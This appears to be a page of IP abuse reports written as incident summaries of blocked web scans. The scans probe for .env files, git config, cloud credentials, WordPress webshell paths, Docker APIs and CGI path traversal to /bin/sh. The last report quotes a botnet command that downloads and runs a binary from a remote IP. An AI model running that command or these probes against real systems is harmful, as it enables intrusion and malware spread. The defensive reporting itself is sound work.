Observed systematic automated reconnaissance (T1595) targeting sensitive environment configuration a ...
show moreObserved systematic automated reconnaissance (T1595) targeting sensitive environment configuration artifacts. Forensic analysis identifies unauthorized GET requests directed at /.env and /.env.backup, indicating intent to exfiltrate application credentials and server-side secrets. The activity was intercepted by ModSecurity (Rule ID 210492) following high-frequency violations of global generic security policies. All malicious ingress attempts were successfully neutralized at the application boundary, resulting in HTTP 403 Forbidden response codes.
show less
Observed systematic automated reconnaissance (T1595) and vulnerability discovery targeting web appli ...
show moreObserved systematic automated reconnaissance (T1595) and vulnerability discovery targeting web application administrative interfaces and configuration artifacts. Forensic analysis identified repeated unauthorized GET requests for sensitive endpoints including /admin.php and /config.php, indicating intent to locate backdoors or harvest server-side configuration data. Global threat intelligence correlates this activity with high-confidence automated abuse profiles, showing 100% confidence of malicious intent from multiple security vendors. All ingress attempts were successfully neutralized at the application and security layer, resulting in HTTP 403 Forbidden and 404 Not Found response codes.
show less
Observed systematic automated reconnaissance (T1595) and vulnerability discovery targeting high-valu ...
show moreObserved systematic automated reconnaissance (T1595) and vulnerability discovery targeting high-value WordPress plugin artifacts. Forensic log analysis identifies repeated GET requests for /wp-content/plugins/hellopress/wp_filemanager.php and /xxx.php, indicative of unauthorized path discovery for potential webshell delivery or plugin exploitation. Correlation with global threat intelligence confirms a high-persistence malicious actor with 100% abuse confidence and thousands of historical reports. All malicious ingress attempts were successfully neutralized, returning HTTP 404 response codes.
show less
Observed systematic automated reconnaissance and information disclosure attempts (T1595) targeting s ...
show moreObserved systematic automated reconnaissance and information disclosure attempts (T1595) targeting sensitive environment configuration artifacts. Forensic logs identify unauthorized GET requests directed at the /.env file, indicating clear intent to harvest application credentials and server-side secrets. Associated activity included structural mapping via probes for /sitemap.xml to identify unlinked application components. All malicious ingress attempts were successfully neutralized, resulting in HTTP 403 Forbidden and 404 Not Found response codes.
show less
Observed persistent automated reconnaissance (T1595) targeting specific WordPress plugin vulnerabili ...
show moreObserved persistent automated reconnaissance (T1595) targeting specific WordPress plugin vulnerabilities and administrative PHP artifacts. Forensic log analysis identifies over 320 correlated events probing for high-interest endpoints, specifically /wp-content/plugins/hellopress/wp_filemanager.php and /chosen.php, indicative of unauthorized path discovery for potential webshell delivery. Correlation with global threat intelligence confirms a 100% abuse confidence rating consistent with bot-driven vulnerability scanning campaigns. All malicious ingress attempts were successfully neutralized at the application boundary, resulting in HTTP 404 response codes.
show less
Observed systematic automated reconnaissance (T1595) targeting specific WordPress plugin vulnerabili ...
show moreObserved systematic automated reconnaissance (T1595) targeting specific WordPress plugin vulnerabilities and administrative PHP artifacts. Forensic log analysis identifies high-frequency probing (400+ correlated events) for sensitive paths including /wp-content/plugins/hellopress/wp_filemanager.php and /chosen.php, indicative of unauthorized path discovery and webshell scanning attempts. Threat intelligence correlation validates this source as a persistent malicious actor with a 100% abuse confidence rating. All ingress attempts were effectively neutralized at the application boundary, resulting in HTTP 404 response codes.
show less
Observed high-frequency automated reconnaissance and exploitation attempts (T1595) targeting the /ap ...
show moreObserved high-frequency automated reconnaissance and exploitation attempts (T1595) targeting the /app/ endpoint via persistent HTTP POST requests. Forensic analysis confirms systematic brute-force activity (T1110) consistent with unauthorized credential stuffing or API abuse, as evidenced by 60 correlated events within a single detection window. Global threat intelligence correlation validates this source as a high-confidence malicious actor with extensive multi-vector campaign history. All unauthorized ingress attempts were successfully intercepted and neutralized, resulting in HTTP 403 Forbidden response codes.
show less
Observed systematic automated reconnaissance (T1595) targeting the mod_pagespeed module to identify ...
show moreObserved systematic automated reconnaissance (T1595) targeting the mod_pagespeed module to identify potential Server-Side Request Forgery (SSRF) or Open Redirect vulnerabilities. Forensic log analysis confirms unauthorized POST requests directed at /mod_pagespeed_beacon with URL parameters pointing to internal Roundcube webmail artifacts, indicating an attempt to probe or pivot into mail infrastructure metadata. While external threat intelligence reflects low confidence, the behavioral artifacts represent clear automated vulnerability research (T1190). All malicious ingress attempts were successfully neutralized at the application tier, resulting in HTTP 403 Forbidden responses.
show less
Observed systematic automated reconnaissance (T1595) and high-criticality exploitation attempts targ ...
show moreObserved systematic automated reconnaissance (T1595) and high-criticality exploitation attempts targeting container infrastructure and legacy CGI binaries. The actor utilized HTTP/1.1 GET requests for /containers/json to map Docker environments and a POST request featuring recursive path traversal (/%2e%2e/) toward /cgi-bin/ aimed at executing /bin/sh for Remote Code Execution (RCE). Correlation with global threat intelligence confirms a 100% abuse confidence rating with extensive historical evidence of multi-vector brute-force campaigns. All malicious ingress attempts were successfully neutralized, resulting in HTTP 400 and 404 response codes.
show less
Observed systematic automated reconnaissance (T1595) targeting cloud infrastructure configuration an ...
show moreObserved systematic automated reconnaissance (T1595) targeting cloud infrastructure configuration and sensitive secrets. Forensic analysis identifies unauthorized GET requests for high-value artifacts including /.aws/credentials and /secrets.json, indicating a clear intent to harvest credentials or exfiltrate architectural metadata. Threat intelligence correlation validates a persistent malicious profile with a 100% abuse confidence rating across multiple security vendors. All ingress attempts were effectively neutralized at the application boundary, resulting in HTTP 403 and 404 response codes.
show less
Observed systematic automated reconnaissance (T1595) targeting WordPress infrastructure and administ ...
show moreObserved systematic automated reconnaissance (T1595) targeting WordPress infrastructure and administrative PHP artifacts. Source utilized GET requests to probe for /wp-links-opml.php and /wp-content/themes/theme/about.php, indicating active scanning for potential webshells or unlinked administrative components. Correlation with global threat intelligence confirms high-volume abuse reports consistent with bot-driven directory traversal and unauthorized probing. All malicious requests were successfully neutralized, resulting in HTTP 404 response codes.
show less
Observed systematic automated reconnaissance (T1595) and high-criticality exploitation attempts targ ...
show moreObserved systematic automated reconnaissance (T1595) and high-criticality exploitation attempts targeting web server infrastructure. The actor utilized automated tooling (libredtail-http) to execute a POST request featuring recursive path traversal (/%2e%2e/) aimed at /cgi-bin/bin/sh for Remote Code Execution. Additionally, targeted probes were identified against /index.php seeking to exploit ThinkPHP invokefunction vulnerabilities. Forensic correlation with threat intelligence confirms a 100% abuse confidence rating with persistent malicious behavior. All ingress attempts were successfully neutralized at the application tier, resulting in HTTP 400 and 404 response codes.
show less
Observed systematic automated reconnaissance (T1595) and brute-force activity targeting web applicat ...
show moreObserved systematic automated reconnaissance (T1595) and brute-force activity targeting web application infrastructure. Forensic log analysis identifies repeated POST requests directed at /api/route and /_next endpoints, indicating active probing for Next.js framework vulnerabilities or unauthorized API interaction. Third-party threat intelligence confirms this source is associated with high-confidence web application brute-force campaigns (T1110). All malicious ingress attempts were effectively neutralized at the application tier, resulting in HTTP 404 response codes.
show less
Observed aggressive automated reconnaissance and multi-vector web application exploitation attempts ...
show moreObserved aggressive automated reconnaissance and multi-vector web application exploitation attempts (T1595/T1190). Forensic analysis identified directory traversal and Local File Inclusion (LFI) probes targeting the 'lang' parameter at /index.php, alongside a sophisticated PHP injection attack against /hello.world utilizing the php://input I/O stream for unauthorized code execution. ModSecurity (Rule ID 218420) successfully intercepted the malicious payload, effectively neutralizing the threat with an HTTP 403 Forbidden response.
show less
Observed systematic automated reconnaissance and sensitive file discovery (T1595/T1005) targeting ve ...
show moreObserved systematic automated reconnaissance and sensitive file discovery (T1595/T1005) targeting version control metadata. Forensic log analysis confirms unauthorized GET requests directed at the /.git/config artifact, indicating clear intent to exfiltrate repository configuration details and potential secrets. The activity was intercepted by ModSecurity (Rule ID 210492) following high-frequency probing of hidden directories. All malicious requests were successfully neutralized, resulting in HTTP 403 Forbidden status codes.
show less
Observed systematic automated reconnaissance (T1595) targeting sensitive environment configuration a ...
show moreObserved systematic automated reconnaissance (T1595) targeting sensitive environment configuration artifacts. Forensic analysis identifies unauthorized GET requests for /.env.backup and /.env.production, indicating clear intent to exfiltrate credentials and server-side secrets. The activity triggered ModSecurity Rule 210492 (Global Generic Rules) following multiple policy violations. All malicious ingress attempts were successfully mitigated with HTTP 403 Forbidden responses, resulting in a permanent firewall-level IP ban.
show less
Observed systematic automated reconnaissance (T1595) and information disclosure attempts targeting s ...
show moreObserved systematic automated reconnaissance (T1595) and information disclosure attempts targeting sensitive environment and configuration artifacts. Forensic analysis identifies unauthorized GET requests for /.env.backup and /config/secrets.yml, indicating clear intent to harvest credentials or sensitive architectural metadata. Activity was intercepted by ModSecurity (Rule ID 210492) following multiple violations of global generic security policies. All ingress attempts were neutralized with HTTP 403 response codes, concluding in a permanent firewall-level IP ban.
show less
Observed systematic automated reconnaissance (T1595) and vulnerability probing targeting WordPress a ...
show moreObserved systematic automated reconnaissance (T1595) and vulnerability probing targeting WordPress application artifacts. Forensic log analysis identifies the source attempting to locate and exploit specific plugin vulnerabilities, including attempts to access /wp-content/plugins/hellopress/wp_filemanager.php and /class-wp-image.php. The activity is consistent with bot-driven directory traversal and unauthorized webshell probing aimed at achieving initial access or persistence. All malicious ingress attempts were effectively neutralized at the application tier, resulting in HTTP 404 response codes.
show less
Observed automated reconnaissance (T1595) targeting WordPress plugin directories and unlinked PHP ar ...
show moreObserved automated reconnaissance (T1595) targeting WordPress plugin directories and unlinked PHP artifacts. Forensic log analysis identifies systematic probing for potential webshells or backdoor components, specifically targeting /wp-content/plugins/fix/up.php and /NewFile.php. This behavior is indicative of automated bot-driven vulnerability research aimed at establishing persistence or exploiting misconfigured file upload handlers. All malicious ingress attempts were successfully mitigated with the server returning HTTP 404.
show less
Observed systematic automated reconnaissance and path discovery (T1595) targeting specific web appli ...
show moreObserved systematic automated reconnaissance and path discovery (T1595) targeting specific web application artifacts. Forensic logs identify the actor probing for suspicious PHP scripts including /themes/zMousse/otuz1.php and /xxx.php, indicating intent to locate webshells or unlinked administrative interfaces for exploitation. Correlation with global threat intelligence confirms a high-confidence malicious profile with a history of automated abuse. All unauthorized ingress attempts were successfully mitigated at the application tier, resulting in HTTP 404 status codes.
show less
Observed automated reconnaissance and vulnerability probing (T1595.002) targeting WordPress applicat ...
show moreObserved automated reconnaissance and vulnerability probing (T1595.002) targeting WordPress application infrastructure. Forensic analysis identified the actor attempting to locate webshell artifacts and exploit paths, specifically probing for /wp-content/uploads/wpr-addons/forms/b1ack.php and /NewFile.php. This indicates clear intent to identify vulnerabilities in specific plugins (e.g., Royal Elementor Addons) for unauthorized file inclusion or persistence. All ingress attempts were neutralized, resulting in HTTP 404 response codes.
show less
Observed systematic automated reconnaissance (T1595) and exploitation attempts targeting web infrast ...
show moreObserved systematic automated reconnaissance (T1595) and exploitation attempts targeting web infrastructure. Forensic logs identify a high-criticality POST request utilizing recursive path traversal sequences (/%2e%2e/) toward /cgi-bin/ aimed at executing /bin/sh for Remote Code Execution (RCE). Secondary activity included unauthorized enumeration of container metadata via the /containers/json endpoint. Correlation with threat intelligence confirms a 100% abuse confidence rating with multiple malicious flags from primary security vendors. All ingress attempts were successfully neutralized at the application tier, resulting in HTTP 400 and 404 response codes.
show less
Observed systematic automated reconnaissance and exploitation attempts (T1595/T1059.004) targeting w ...
show moreObserved systematic automated reconnaissance and exploitation attempts (T1595/T1059.004) targeting web infrastructure. Forensic logs indicate the source utilized the 'libredtail-http' agent to probe for Docker API artifacts via /containers/json and attempted a high-criticality path traversal attack (/%2e%2e/) against /cgi-bin/ aimed at executing /bin/sh for Remote Code Execution (RCE). Threat intelligence confirms a 100% abuse confidence score with multiple malicious flags from primary security vendors. All unauthorized requests were effectively neutralized, resulting in HTTP 404 and HTTP 400 response codes.
show less
Malicious source (ISP: Celcom Axiata Berhad) identified executing automated reconnaissance and unaut ...
show moreMalicious source (ISP: Celcom Axiata Berhad) identified executing automated reconnaissance and unauthorized probing of sensitive URI artifacts (MITRE T1083). Forensic telemetry reveals persistent targeting of the /wp-login.php endpoint, indicative of CMS account enumeration or brute-force intent. Multi-vendor threat intelligence (VirusTotal 13/94) confirms the IP is associated with high-confidence bad web bot activity and distributed web application attacks. All unauthorized interaction attempts were successfully neutralized by local security policies, resulting in continuous HTTP 404 Not Found responses.
show less
Malicious actor (ISP: ETCLOUDS LIMITED) identified executing automated remote command injection targ ...
show moreMalicious actor (ISP: ETCLOUDS LIMITED) identified executing automated remote command injection targeting the /device.rsp IoT endpoint. Forensic analysis of SIEM logs reveals a POST request carrying a shell command sequence (cd /tmp; wget http://156.229.165.225/alyssaaarm7; chmod 777; ./alyssaaarm7) designed to achieve initial access and deploy a malicious binary (MITRE T1190, T1055). This TTP is characteristic of automated botnet propagation campaigns seeking to exploit vulnerable network-attached devices. The attack was successfully neutralized by the ModSecurity WAF, resulting in a consistent HTTP 403 Forbidden response.
show less
Bad Web BotWeb App AttackIoT Targeted
By clicking โAccept allโ, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.